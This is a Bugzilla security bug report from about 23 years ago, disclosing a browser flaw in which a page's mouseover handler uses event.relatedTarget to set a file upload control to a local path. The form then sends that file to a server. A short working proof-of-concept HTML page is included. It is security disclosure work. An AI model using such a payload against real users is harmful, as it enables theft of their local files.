Closed
Bug 164687
Opened 23 years ago
Closed 23 years ago
Uploading arbitrary files using event.relatedTarget
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
VERIFIED
DUPLICATE
of bug 164023
People
(Reporter: security-bugs, Assigned: alexsavulov)
Details
It is possible to steal local files with the file upload control.
This is somewhat related to bug 163598 but the trick is done with
event.related target.
The following reads a local file and sends it to remote server.
-----------------------------------
<html>
Written by <a href="http://www.guninski.com">Georgi Guninski</a>
<br>
<form action="http://localhost/cgi-bin/x.pl" enctype="multipart/form-data"
method="POST">
Mouse over this:
<input type=file name=c
onmouseover='event.relatedTarget.value="/var/www/html/index.html"'><br>
<input type=submit>
</form>
</html>
-----------------------------------
Due to the increased number of file upload attacks, I suggest adding a
warning whenever a file is being uploaded.
Georgi Guninski
Comment 1•23 years ago
|
||
*** This bug has been marked as a duplicate of 164023 ***
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → DUPLICATE
Reporter | ||
Updated•22 years ago
|
Group: security
Updated•6 years ago
|
Component: HTML: Form Submission → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•